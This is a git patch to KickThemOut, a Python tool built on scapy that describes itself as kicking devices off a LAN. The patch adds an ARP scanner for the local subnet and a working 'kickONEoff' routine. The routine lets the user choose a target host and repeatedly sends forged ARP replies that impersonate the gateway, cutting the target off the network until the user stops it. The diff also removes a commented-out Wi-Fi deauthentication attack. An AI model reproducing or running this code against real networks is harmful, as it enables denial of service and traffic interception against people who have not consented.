From 7da2359a29cd2b48e761dea7375a660bb45361be Mon Sep 17 00:00:00 2001 From: k4m4 Date: Sat, 31 Dec 2016 02:41:34 +0200 Subject: [PATCH] Successful KickONEOff function --- kickthemout.py | 149 ++++++++++++++++++++++++++++++------------------- scan.py | 64 +++++++++++++++++++++ spoof.py | 59 ++++++++++---------- 3 files changed, 184 insertions(+), 88 deletions(-) create mode 100644 scan.py diff --git a/kickthemout.py b/kickthemout.py index 5acf0e3..b2ad360 100644 --- a/kickthemout.py +++ b/kickthemout.py @@ -1,19 +1,23 @@ #!/usr/bin/env python # -.- coding: utf-8 -.- # kickthemout.py +# authors: k4m4 & xdavidhu """ -Copyright (C) 2016 Nikolaos Kamarinakis (nikolaskam@gmail.com) +Copyright (C) 2016 Nikolaos Kamarinakis (nikolaskam@gmail.com) & David Schütz (xdavid@protonmail.com) See License at nikolaskama.me (https://nikolaskama.me/kickthemoutproject) """ -import time, os, sys, logging +import time, os, sys, logging, math +import scan, spoof from time import sleep +logging.getLogger("scapy.runtime").setLevel(logging.ERROR) # Shut up scapy! +from scapy.all import * BLUE, RED, WHITE, YELLOW, MAGENTA, GREEN, END = '\33[94m', '\033[91m', '\33[97m', '\33[93m', '\033[1;35m', '\033[1;32m', '\033[0m' def heading(): - print(GREEN + """ + sys.stdout.write(GREEN + """ █ █▀ ▄█ ▄█▄ █ █▀ ▄▄▄▄▀ ▄ █ ▄███▄ █▀▄▀█ ████▄ ▄ ▄▄▄▄▀ █▄█ ██ █▀ ▀▄ █▄█ ▀▀▀ █ █ █ █▀ ▀ █ █ █ █ █ █ ▀▀▀ █ █▀▄ ██ █ ▀ █▀▄ █ ██▀▀█ ██▄▄ █ ▄ █ █ █ █ █ █ @@ -22,7 +26,7 @@ def heading(): ▀ ▀ ▀ ▀ ▀▀▀ """ + END + BLUE + '\n' + '{0}Kick Devices Off Your LAN ({1}KickThemOut{2}){3}'.format(YELLOW, RED, YELLOW, BLUE).center(88) + - '\n' + 'Made With <3 by: {0}Nikolaos Kamarinakis ({1}k4m4{2}){3}'.format(YELLOW, RED, YELLOW, BLUE).center(87) + + '\n' + 'Made With <3 by: {0}Nikolaos Kamarinakis ({1}k4m4{2}) & {0}David Schütz ({1}xdavidhu{2}){3}'.format(YELLOW, RED, YELLOW, BLUE).center(67) + '\n' + 'Version: {0}0.1{1}'.format(YELLOW, END).center(77)) def optionBanner(): @@ -35,8 +39,44 @@ def optionBanner(): sleep(0.2) print('\n\t{0}[{1}E{2}]{3} Exit KickThemOut\n').format(YELLOW, RED, YELLOW, WHITE) +def scanNetwork(): + global hostsList + hostsList = scan.scanNetwork() + def kickoneoff(): - print('kickoneoff') + os.system("clear||cls") + + print("\n{0}kickONEOff{1} selected...{2}\n").format(RED, GREEN, END) + scanNetwork() + print "Online IPs: " + + for i in range(len(onlineIPs)): + print(" ["+str(i)+"] {0}"+str(onlineIPs[i])+"{1}\n").format(RED, END) + + choice = int(raw_input("IP of the target: ")) # TODO: try, except + one_target_ip = onlineIPs[choice] + one_target_mac = "" + for host in hostsList: + if host[0] == one_target_ip: + one_target_mac = host[1] + if one_target_mac == "": + print("\nIP address is not up. Please try again.") + return + + print("\n{0}Target mac => '{1}" + one_target_mac + "{2}'{3}\n").format(GREEN, RED, GREEN, END) + print("{0}Spoofing started... {1}\n").format(GREEN, END) + try: + while True: + spoof.sendPacket(defaultInterfaceMac, defaultGatewayIP, one_target_ip, one_target_mac) + time.sleep(15) + except KeyboardInterrupt: + print("\n{0}Re-arping{1} target...{2}").format(RED, GREEN, END) + rearp = 1 + while rearp != 10: + spoof.sendPacket(defaultGatewayMac, defaultGatewayIP, one_target_ip, one_target_mac) + rearp = rearp + 1 + time.sleep(0.5) + print("\n{0}Done.{1}").format(GREEN, END) def kicksomeoff(): print('kicksomeoff') @@ -44,71 +84,56 @@ def kicksomeoff(): def kickalloff(): print('kickalloff') -""" -def deauth_attack(iface, bssid): +def getDefaultInterface(): + def long2net(arg): + if (arg <= 0 or arg >= 0xFFFFFFFF): + raise ValueError("illegal netmask value", hex(arg)) + return 32 - int(round(math.log(0xFFFFFFFF - arg, 2))) - client = 'FF:FF:FF:FF:FF:FF' + def to_CIDR_notation(bytes_network, bytes_netmask): + network = scapy.utils.ltoa(bytes_network) + netmask = long2net(bytes_netmask) + net = "%s/%s" % (network, netmask) + if netmask < 16: + return None - conf.iface = iface - conf.verb = 0 - packet = RadioTap()/Dot11(type=0,subtype=12,addr1=client, - addr2=bssid,addr3=bssid)/Dot11Deauth(reason=7) + return net - print('\nChoose option from menu:\n') - print('\t{0}[{1}1{2}]{3} Kick Once').format(YELLOW, RED, YELLOW, WHITE) - sleep(0.2) - print('\t{0}[{1}2{2}]{3} Keep Kicking').format(YELLOW, RED, YELLOW, WHITE) - sleep(0.2) + for network, netmask, _, interface, address in scapy.config.conf.route.routes: - choice = None - while choice == None: - header = ('\n{0}kickthemout{1}> '.format(BLUE, WHITE)) - choice = raw_input(header) - if choice == '1': - pcounter_header = ('{0}kickthemout{1}> numofpackets: '.format(BLUE, WHITE)) - pcounter = raw_input(pcounter_header) - print(pcounter) # {TESTING} - packets_sent = 0 - for i in range(int(pcounter)): - sendp(packet) - packets_sent += 1 - print 'Deauth sent via: ' + iface + ' to BSSID: ' + bssid + '.\nPackets sent: ' + str(packets_sent) - sleep(2) - elif choice == '2': - time_header = ('{0}kickthemout{1}> keepkickingfor(mins): '.format(BLUE, WHITE)) - attack_time = float(raw_input(time_header)) - start = time.time() - packets_sent = 0 - while (time.time() - start) != attack_time: - sendp(packet) - packets_sent += 1 - print 'Deauth sent via: ' + iface + ' to BSSID: ' + bssid + '.\nPackets sent: ' + str(packets_sent) - sleep(2) - else: - choice = None - print('*INVALID OPTION*') # {TESTING} -""" + # skip loopback network and default gw + if network == 0 or interface == 'lo' or address == '127.0.0.1' or address == '0.0.0.0': + continue + + if netmask <= 0 or netmask == 0xFFFFFFFF: + continue + + net = to_CIDR_notation(network, netmask) + + if interface != scapy.config.conf.iface: + continue + + if net: + return interface + +def getGatewayIP(): + getGateway_p = sr1(IP(dst="google.com", ttl=0) / ICMP() / "XXXXXXXXXXX", verbose=False) + return getGateway_p.src def main(): heading() + print("\n{0}Using interface '{1}"+defaultInterface+"{2}' with mac address '{3}"+defaultInterfaceMac+"{4}'.\nGateway IP: '{5}" + + defaultGatewayIP + "{6}'. {7}" + str(len(hostsList)) + "{8} hosts are up.{9}").format(GREEN, RED, GREEN, RED, GREEN, RED, GREEN, RED, GREEN, END) + try: - # CHECK FOR WIRELESS CARD - iface_header = ('\n{0}kickthemout{1}> interface: '.format(BLUE, WHITE)) - iface = raw_input(iface_header) - - # SCAN (AIRODUMP-NG) & PARSE (BSSIDs) - # ... - - bssid_header = ('{0}kickthemout{1}> bssid: '.format(BLUE, WHITE)) - bssid = raw_input(bssid_header) # {TESTING} while True: optionBanner() - header = ('{0}kickthemout{1}> '.format(BLUE, WHITE)) + header = ('{0}kickthemout{1}> {2}'.format(BLUE, WHITE, END)) choice = raw_input(header) if choice.upper() == 'E' or choice.upper() == 'EXIT': @@ -131,8 +156,18 @@ def main(): except KeyboardInterrupt: print('\nThanks for dropping by.' - '\nCatch ya later!') - + '\nCatch ya later!{0}').format(END) if __name__ == '__main__': + + defaultInterface = getDefaultInterface() + defaultGatewayIP = getGatewayIP() + defaultInterfaceMac = get_if_hwaddr(defaultInterface) + scanNetwork() + onlineIPs = [] + for host in hostsList: + onlineIPs.append(host[0]) + if host[0] == defaultGatewayIP: + defaultGatewayMac = host[1] + main() diff --git a/scan.py b/scan.py new file mode 100644 index 0000000..796d632 --- /dev/null +++ b/scan.py @@ -0,0 +1,64 @@ +#!/usr/bin/env python +# -.- coding: utf-8 -.- +# scan.py +# author: Benedikt Waldvogel +# edited by: k4m4 & xdavidhu + +import scapy.config, scapy.layers.l2, scapy.route, socket, math, errno + +def scanNetwork(): + + def long2net(arg): + if (arg <= 0 or arg >= 0xFFFFFFFF): + raise ValueError("illegal netmask value", hex(arg)) + return 32 - int(round(math.log(0xFFFFFFFF - arg, 2))) + + + def to_CIDR_notation(bytes_network, bytes_netmask): + network = scapy.utils.ltoa(bytes_network) + netmask = long2net(bytes_netmask) + net = "%s/%s" % (network, netmask) + if netmask < 16: + return None + + return net + + + def scan_and_print_neighbors(net, interface, timeout=1): + hostsList = [] + try: + ans, unans = scapy.layers.l2.arping(net, iface=interface, timeout=timeout, verbose=False) + for s, r in ans.res: + mac = r.sprintf("%Ether.src%") + ip = r.sprintf("%ARP.psrc%") + line = r.sprintf("%Ether.src% %ARP.psrc%") + hostsList.append([ip, mac]) + try: + hostname = socket.gethostbyaddr(r.psrc) + line += "," + hostname[0] + except socket.herror: + pass + except socket.error as e: + if e.errno == errno.EPERM: # Operation not permitted + exit() + else: + raise + return hostsList + + for network, netmask, _, interface, address in scapy.config.conf.route.routes: + + # skip loopback network and default gw + if network == 0 or interface == 'lo' or address == '127.0.0.1' or address == '0.0.0.0': + continue + + if netmask <= 0 or netmask == 0xFFFFFFFF: + continue + + net = to_CIDR_notation(network, netmask) + + if interface != scapy.config.conf.iface: + # see http://trac.secdev.org/scapy/ticket/537 + continue + + if net: + return scan_and_print_neighbors(net, interface) diff --git a/spoof.py b/spoof.py index f001ff0..2d6c711 100644 --- a/spoof.py +++ b/spoof.py @@ -1,3 +1,13 @@ +#!/usr/bin/env python +# -.- coding: utf-8 -.- +# spoof.py +# authors: k4m4 & xdavidhu + +""" +Copyright (C) 2016 Nikolaos Kamarinakis (nikolaskam@gmail.com) & David Schütz (xdavid@protonmail.com) +See License at nikolaskama.me (https://nikolaskama.me/kickthemoutproject) +""" + import sys from scapy.all import ( get_if_hwaddr, @@ -7,40 +17,27 @@ from scapy.all import ( sendp ) -try: - my_mac = sys.argv[1] - interface = sys.argv[2] - my_ip = sys.argv[3] - target_ip = sys.argv[4] - target_mac = sys.argv[5] -except: - print "Usage: sudo python spoof.py [MY_MAC] [IFACE] [GATEWAY_IP] [TARGET_IP] [TARGET_MAC]" - exit() +def sendPacket(my_mac, gateway_ip, target_ip, target_mac): -ether = Ether() -ether.src = my_mac # Default: network card mac + ether = Ether() + ether.src = my_mac -arp = ARP() -arp.psrc = my_ip -arp.hwsrc = my_mac + arp = ARP() + arp.psrc = gateway_ip + arp.hwsrc = my_mac -arp = arp -arp.pdst = target_ip # Default: 0.0.0.0 -arp.hwdst = target_mac # Default: 00:00:00:00:00:00 + arp = arp + arp.pdst = target_ip + arp.hwdst = target_mac -ether = ether -ether.src = my_mac -ether.dst = target_mac # Default: ff:ff:ff:ff:ff:f + ether = ether + ether.src = my_mac + ether.dst = target_mac -def craftRequestPkt(): - packet = ether/arp - sendp(x=packet, inter=1, count=1000) - -def craftReplyPkt(): arp.op = 2 - packet = ether/arp - sendp(x=packet, inter=1, count=1000) - - -if __name__ == '__main__': - craftReplyPkt() + + def broadcastPacket(): + packet = ether/arp + sendp(x=packet, verbose=False) + + broadcastPacket()